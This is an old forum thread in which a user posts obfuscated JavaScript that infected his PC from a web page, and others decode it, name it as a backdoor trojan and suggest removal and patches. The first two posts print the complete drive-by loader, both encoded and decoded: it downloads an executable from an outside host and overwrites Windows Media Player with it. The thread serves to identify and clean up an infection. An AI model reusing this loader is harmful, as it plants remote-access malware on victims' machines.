Hacked help!

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • Skeptical
    Senior Member
    • Oct 2000
    • 2007

    Hacked help!

    Can someone help me figure out what virus this is? It appeared on a web page and instantly my Zonealarm and Norton AV shut down. I know I was infected with something but can't figure out what it is yet. Thanks.

    PHP Code:
    <script type="text/javascript">
    function 
    convertString2Unicode(s)
    {
    var 
    uniString ""hexValuniChar;
    for(var 
    0s.length; ++i)
    {
    hexVal Number(s.charCodeAt(i)).toString(16);
    uniChar "[url="file:///u"]\\u[/url]" + ("000" + hexVal).match(/.{4}$/)[0];
    uniString += uniChar;
    }
    return 
    uniString;
    }
    <
    script type="text/javascript">
    function 
    convertString2Unicode(s)
    {
    var 
    uniString ""hexValuniChar;
    for(var 
    0s.length; ++i)
    {
    hexVal Number(s.charCodeAt(i)).toString(16);
    uniChar "[url="file:///u"]\\u[/url]" + ("000" + hexVal).match(/.{4}$/)[0];
    uniString += uniChar;
    }
    return 
    uniString;
    }
    document.write('\u003c\u0074\u0065\u0078\u0074\u0061\u0072\u0065
    \u0061\u0020\u0069\u0064\u003d\u0022\u0063\u006f\u0064\u0065\u0022
    \u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073
    \u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u003b\u0022
    \u003e\u000d\u000a\u000d\u000a\u0020\u0020\u0020\u0020\u0076\u0061
    \u0072\u0020\u0078\u0020\u003d\u0020\u006e\u0065\u0077\u0020\u0041
    \u0063\u0074\u0069\u0076\u0065\u0058\u004f\u0062\u006a\u0065\u0063
    \u0074\u0028\u0022\u004d\u0069\u0063\u0072\u006f\u0073\u006f\u0066
    \u0074\u002e\u0058\u004d\u004c\u0048\u0054\u0054\u0050\u0022\u0029
    \u003b\u0020\u000d\u000a\u0020\u0020\u0020\u0020\u0078
    \u002e\u004f\u0070\u0065\u006e\u0028\u0022\u0047\u0045\u0054\u0022
    \u002c\u0020\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077
    \u0077\u0077\u002e\u006c\u0068\u0063\u006f\u006e\u006c\u0069
    \u006e\u0065\u002e\u006e\u0065\u0074\u002f\u006a\u0073
    \u002f\u006d\u006d\u0063\u002e\u0065\u0078\u0065\u0022\u002c\u0030
    \u0029\u003b\u0020\u000d\u000a\u0020\u0020\u0020\u0020\u0078
    \u002e\u0053\u0065\u006e\u0064\u0028\u0029\u003b\u0020
    \u000d\u000a\u0020\u0020\u0020\u0020\u000d\u000a\u0020\u0020\u0020
    \u0020\u0076\u0061\u0072\u0020\u0073\u0020\u003d\u0020\u006e\u0065
    \u0077\u0020\u0041\u0063\u0074\u0069\u0076\u0065\u0058\u004f\u0062
    \u006a\u0065\u0063\u0074\u0028\u0022\u0041\u0044\u004f\u0044\u0042
    \u002e\u0053\u0074\u0072\u0065\u0061\u006d\u0022\u0029
    \u003b\u000d\u000a\u0020\u0020\u0020\u0020\u0073
    \u002e\u004d\u006f\u0064\u0065\u0020\u003d\u0020\u0033
    \u003b\u000d\u000a\u0020\u0020\u0020\u0020\u0073\u002e\u0054\u0079
    \u0070\u0065\u0020\u003d\u0020\u0031\u003b\u000d\u000a\u0020\u0020
    \u0020\u0020\u0073\u002e\u004f\u0070\u0065\u006e\u0028\u0029
    \u003b\u000d\u000a\u0020\u0020\u0020\u0020\u0073\u002e\u0057\u0072
    \u0069\u0074\u0065\u0028\u0078\u002e\u0072\u0065\u0073\u0070
    \u006f\u006e\u0073\u0065\u0042\u006f\u0064\u0079\u0029
    \u003b\u000d\u000a\u000d\u000a\u0020\u0020\u0020\u0020\u0073
    \u002e\u0053\u0061\u0076\u0065\u0054\u006f\u0046\u0069\u006c\u0065
    \u0028\u0022\u0043\u003a\u005c\u005c\u0050\u0072\u006f\u0067\u0072
    \u0061\u006d\u0020\u0046\u0069\u006c\u0065\u0073\u005c\u005c\u0057
    \u0069\u006e\u0064\u006f\u0077\u0073\u0020\u004d\u0065\u0064\u0069
    \u0061\u0020\u0050\u006c\u0061\u0079\u0065\u0072\u005c\u005c\u0077
    \u006d\u0070\u006c\u0061\u0079\u0065\u0072\u002e\u0065\u0078\u0065
    \u0022\u002c\u0032\u0029\u003b\u000d\u000a\u0020\u0020\u0020\u0020
    \u006c\u006f\u0063\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072
    \u0065\u0066\u0020\u003d\u0020\u0022\u006d\u006d\u0073
    \u003a\u002f\u002f\u0022
    \u003b\u000d\u000a\u000d\u000a\u003c\u002f\u0074\u0065\u0078\u0074
    \u0061\u0072\u0065\u0061\u003e\u000d\u000a\u000d\u000a\u003c\u0073
    \u0063\u0072\u0069\u0070\u0074\u0020\u006c\u0061\u006e\u0067\u0075
    \u0061\u0067\u0065\u003d\u0022\u006a\u0061\u0076\u0061\u0073\u0063
    \u0072\u0069\u0070\u0074\u0022\u003e\u000d\u000a\u000d\u000a\u0020
    \u0020\u0020\u0020\u0066\u0075\u006e\u0063\u0074\u0069
    \u006f\u006e\u0020\u0070\u0072\u0065\u0070\u0061\u0072\u0065\u0063
    \u006f\u0064\u0065\u0028\u0063\u006f\u0064\u0065\u0029\u0020
    \u007b\u000d\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020
    \u0072\u0065\u0073\u0075\u006c\u0074\u0020\u003d\u0020\u0027\u0027
    \u003b\u000d\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020
    \u006c\u0069\u006e\u0065\u0073\u0020\u003d\u0020\u0063\u006f\u0064
    \u0065\u002e\u0073\u0070\u006c\u0069\u0074\u0028\u002f\u005c\u0072
    \u005c\u006e\u002f\u0029\u003b\u000d\u000a\u0020\u0020\u0020\u0020
    \u0020\u0020\u0020\u0020\u0066\u006f\u0072\u0020\u0028\u0069
    \u003d\u0030\u003b\u0069\u003c\u006c\u0069\u006e\u0065\u0073
    \u002e\u006c\u0065\u006e\u0067\u0074\u0068\u003b\u0069
    \u002b\u002b\u0029\u0020\u007b\u000d\u000a\u0020\u0020\u0020\u0020
    \u0020\u0020\u0020\u0020\u000d\u000a\u0020\u0020\u0020\u0020\u0020
    \u0020\u0020\u0020\u0020\u0020\u0020\u0020\u006c\u0069\u006e\u0065
    \u0020\u003d\u0020\u006c\u0069\u006e\u0065\u0073\u005b\u0069
    \u005d\u003b\u000d\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020
    \u0020\u0020\u0020\u0020\u0020\u006c\u0069\u006e\u0065\u0020
    \u003d\u0020\u006c\u0069\u006e\u0065\u002e\u0072\u0065\u0070
    \u006c\u0061\u0063\u0065\u0028\u002f\u005e\u005c\u0073
    \u002b\u002f\u002c\u0022\u0022\u0029\u003b\u000d\u000a\u0020\u0020
    \u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020
    \u006c\u0069\u006e\u0065\u0020\u003d\u0020\u006c\u0069\u006e\u0065
    \u002e\u0072\u0065\u0070\u006c\u0061\u0063\u0065\u0028
    \u002f\u005c\u0073\u002b\u0024\u002f\u002c\u0022\u0022\u0029
    \u003b\u000d\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020
    \u0020\u0020\u0020\u0020\u006c\u0069\u006e\u0065\u0020\u003d\u0020
    \u006c\u0069\u006e\u0065\u002e\u0072\u0065\u0070\u006c\u0061\u0063
    \u0065\u0028\u002f\u0027\u002f\u0067\u002c\u0022\u005c\u005c\u0027
    \u0022\u0029\u003b\u000d\u000a\u0020\u0020\u0020\u0020\u0020\u0020
    \u0020\u0020\u0020\u0020\u0020\u0020\u006c\u0069\u006e\u0065\u0020
    \u003d\u0020\u006c\u0069\u006e\u0065\u002e\u0072\u0065\u0070
    \u006c\u0061\u0063\u0065\u0028
    \u002f\u005b\u005c\u005c\u005d\u002f\u0067\u002c\u0022
    \u005c\u005c\u005c\u005c\u0022\u0029\u003b\u000d\u000a\u0020\u0020
    \u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020
    \u006c\u0069\u006e\u0065\u0020\u003d\u0020\u006c\u0069\u006e\u0065
    \u002e\u0072\u0065\u0070\u006c\u0061\u0063\u0065\u0028
    \u002f\u005b\u002f\u005d\u002f\u0067\u002c\u0022\u0025\u0032\u0066
    \u0022\u0029\u003b\u000d\u000a\u000d\u000a\u0020\u0020\u0020\u0020
    \u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0069\u0066\u0020
    \u0028\u006c\u0069\u006e\u0065\u0020\u0021\u003d\u0020\u0027\u0027
    \u0029\u0020\u007b\u000d\u000a\u0020\u0020\u0020\u0020\u0020\u0020
    \u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0072
    \u0065\u0073\u0075\u006c\u0074\u0020\u002b\u003d\u0020\u006c\u0069
    \u006e\u0065\u0020\u002b\u0027\u005c\u005c\u0072
    \u005c\u005c\u006e\u0027\u003b\u000d\u000a\u0020\u0020\u0020\u0020
    \u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020
    \u007d\u000d\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020
    \u007d\u000d\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020
    \u0072\u0065\u0074\u0075\u0072\u006e\u0020\u0072\u0065\u0073\u0075
    \u006c\u0074\u003b\u000d\u000a\u0020\u0020\u0020\u0020
    \u007d\u000d\u000a\u0020\u0020\u0020\u0020\u000d\u000a\u0020\u0020
    \u0020\u0020\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020
    \u0064\u006f\u0069\u0074\u0028\u0029\u0020\u007b\u000d\u000a\u0020
    \u0020\u0020\u0020\u0020\u0020\u0020\u0020\u006d\u0079\u0063
    \u006f\u0064\u0065\u0020\u003d\u0020\u0070\u0072\u0065\u0070\u0061
    \u0072\u0065\u0063\u006f\u0064\u0065\u0028\u0064\u006f\u0063\u0075
    \u006d\u0065\u006e\u0074\u002e\u0061\u006c\u006c\u002e\u0063
    \u006f\u0064\u0065\u002e\u0076\u0061\u006c\u0075\u0065\u0029
    \u003b\u000d\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020
    \u006d\u0079\u0055\u0052\u004c\u0020\u003d\u0020\u0022\u0066\u0069
    \u006c\u0065\u003a\u006a\u0061\u0076\u0061\u0073\u0063\u0072\u0069
    \u0070\u0074\u003a\u0065\u0076\u0061\u006c\u0028\u0027\u0022\u0020
    \u002b\u0020\u006d\u0079\u0063\u006f\u0064\u0065\u0020\u002b\u0020
    \u0022\u0027\u0029\u0022\u003b\u000d\u000a\u0020\u0020\u0020\u0020
    \u0020\u0020\u0020\u0020\u0077\u0069\u006e\u0064\u006f\u0077
    \u002e\u006f\u0070\u0065\u006e\u0028\u006d\u0079\u0055\u0052
    \u004c\u002c\u0022\u005f\u006d\u0065\u0064\u0069\u0061\u0022\u0029
    \u0020\u0020\u0020\u0020\u000d\u000a\u0020\u0020\u0020\u0020
    \u007d\u000d\u000a\u0020\u0020\u0020\u0020\u000d\u000a\u0020\u0020
    \u0020\u0020\u0073\u0065\u0074\u0054\u0069\u006d\u0065\u006f\u0075
    \u0074\u0028\u0022\u0064\u006f\u0069\u0074\u0028\u0029\u0022
    \u002c\u0020\u0035\u0030\u0030\u0030\u0029\u003b\u000d\u000a\u0020
    \u0020\u0020\u0020\u000d\u000a\u0020\u0020\u0020\u0020
    \u000d\u000a\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074
    \u003e\u000d\u000a'
    )</script
    Last edited by Skeptical; Sat 4 Oct '03, 2:51am. Reason: Added in linefeeds to the code so the thread doesn't get messed up
    Well, there it is.
    - Keeper of the Grove
  • DarkDelight.net
    Senior Member
    • Jul 2003
    • 1358
    • 3.0.3

    #2
    If you un-obfuscate that code, it reads:

    HTML Code:
    <textarea id="code" style="display:none;">
    
        var x = new ActiveXObject("Microsoft.XMLHTTP"); 
        x.Open("GET", "http://www.lhconline.net/js/mmc.exe",0); 
        x.Send(); 
        
        var s = new ActiveXObject("ADODB.Stream");
        s.Mode = 3;
        s.Type = 1;
        s.Open();
        s.Write(x.responseBody);
    
        s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
        location.href = "mms://";
    
    </textarea>
    
    <script language="javascript">
    
        function preparecode(code) {
            result = '';
            lines = code.split(/\r\n/);
            for (i=0;i<lines.length;i++) {
            
                line = lines[i];
                line = line.replace(/^\s+/,"");
                line = line.replace(/\s+$/,"");
                line = line.replace(/'/g,"\\'");
                line = line.replace(/[\\]/g,"\\\\");
                line = line.replace(/[/]/g,"%2f");
    
                if (line != '') {
                    result += line +'\\r\\n';
                }
            }
            return result;
        }
        
        function doit() {
            mycode = preparecode(document.all.code.value);
            myURL = "file:javascript:eval('" + mycode + "')";
            window.open(myURL,"_media")    
        }
        
        setTimeout("doit()", 5000);
        
        
    </script>
    Sig? What sig?

    Comment

    • rylin
      Senior Member
      • Jan 2001
      • 1067

      #3
      Basically, it just replaced your windows media player executable with what's probably a trojan.

      1) Uninstall windows media player from the control panel
      2) Download it again
      My open eyes see everything, and you see nothing. . .
      That forum

      Comment

      • DarkDelight.net
        Senior Member
        • Jul 2003
        • 1358
        • 3.0.3

        #4
        That is not a nice thing to do.

        OK, we know where the .exe is hosted, right?
        Where is the page which contaied this code?
        Sig? What sig?

        Comment

        • Erwin
          Senior Member
          • Jan 2002
          • 2088

          #5
          Originally posted by DarkDelight.net
          That is not a nice thing to do.

          OK, we know where the .exe is hosted, right?
          Where is the page which contaied this code?
          No, not nice at all.

          Btw, this thread is a good example of how in vB3 wide posts affect the whole thread, unlike in vB2.
          Avatar Chat

          Comment

          • DarkDelight.net
            Senior Member
            • Jul 2003
            • 1358
            • 3.0.3

            #6
            Originally posted by Erwin
            No, not nice at all.

            Btw, this thread is a good example of how in vB3 wide posts affect the whole thread, unlike in vB2.
            Absolutely!

            I hope this is fixed in the new style.
            Sig? What sig?

            Comment

            • rylin
              Senior Member
              • Jan 2001
              • 1067

              #7
              Which is why the oh-so-great Kier should put individual posts in their own table
              (also, having the reply box left-aligned wouldn't hurt either
              My open eyes see everything, and you see nothing. . .
              That forum

              Comment

              • DarkDelight.net
                Senior Member
                • Jul 2003
                • 1358
                • 3.0.3

                #8
                [/offtopic]

                This is a variant of the Backdoor.Beasty Trojan,
                which gives the creator access to your machine.

                I believe it affects Win95/95b/98/98SE/me/NT/2K/XP
                Last edited by DarkDelight.net; Fri 3 Oct '03, 2:04am.
                Sig? What sig?

                Comment

                • Brandon
                  Senior Member
                  • Jul 2002
                  • 250

                  #9
                  Originally posted by DarkDelight.net
                  [/offtopic]

                  This is a variant of the Backdoor.Beasty Trojan,
                  which gives the creator access to your machine.

                  I believe it affects Win95/95b/98/98SE/me/NT/2K/XP
                  Or in other words...ALL windows versions after 3.1

                  Comment

                  • DarkDelight.net
                    Senior Member
                    • Jul 2003
                    • 1358
                    • 3.0.3

                    #10
                    Originally posted by Brandon
                    Or in other words...ALL windows versions after 3.1
                    Not necessarily.

                    It depends exactly what variant we're dealing with here.

                    The original Backdoor.Beasty only affected Win9x

                    I do not believe than any variant can touch linux, OSX, etc.
                    Sig? What sig?

                    Comment

                    • rylin
                      Senior Member
                      • Jan 2001
                      • 1067

                      #11
                      Originally posted by DarkDelight.net
                      Not necessarily.

                      It depends exactly what variant we're dealing with here.

                      The original Backdoor.Beasty only affected Win9x

                      I do not believe than any variant can touch linux, OSX, etc.
                      Since when is linux, OSX windows? :P
                      My open eyes see everything, and you see nothing. . .
                      That forum

                      Comment

                      • DarkDelight.net
                        Senior Member
                        • Jul 2003
                        • 1358
                        • 3.0.3

                        #12
                        Originally posted by rylin
                        Since when is linux, OSX windows? :P
                        Since never, that's why they aren't affected.
                        Sig? What sig?

                        Comment

                        • Mr. HillBilly
                          Senior Member
                          • Jun 2003
                          • 547
                          • 3.0.0 'Gold'

                          #13
                          Security Update for Windows Media Player (KB828026)
                          Download size: 2.8 MB, < 1 minute
                          A security issue has been identified that could allow an attacker to execute commands on a computer running Windows Media Player.

                          October 2003, Cumulative Patch for Internet Explorer 6 Service Pack 1 (KB828750)
                          Download size: 2.1 MB, < 1 minute
                          Security issues identified in Microsoft Internet Explorer (IE) could allow an attacker to compromise systems with IE installed (even if IE is not used as the Web browser). For example, an attacker could run programs on a computer used to view the attacker's Web site.

                          Comment

                          • Skeptical
                            Senior Member
                            • Oct 2000
                            • 2007

                            #14
                            Ah yes I was able to decode the obfuscated javascript code and eventually figured out it was the Backdoor-AMQ trojan. I am just surprised visiting a simple web page could do so much damage. I got no popup prompts. Nothing. And a windows update showed that everything was updated, but I guess not!

                            What got me even more angry is how it was able to shut down my AV and firewall. Aren't AV's and firewalls supposed to be able to handle this type of security breach? Even if it doesn't have the signature to detect the virus, it should at least prevent a third party program from shutting the AV/firewall down!
                            Well, there it is.
                            - Keeper of the Grove

                            Comment

                            • Skeptical
                              Senior Member
                              • Oct 2000
                              • 2007

                              #15
                              Now that everything is fixed, the only thing left to do is to have lhconline.net (which distributed the backdoor) shut down. That site is disguised as a legitimate site, but when you try to click on its links they all go nowhere. Also, the whois record looks like bogus to me. This leads me to think tha the entire site itself was created using fraud, for the sole purpose of distributing the trojan, and perhaps other things.

                              What do you guys think?
                              Well, there it is.
                              - Keeper of the Grove

                              Comment

                              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                              Working...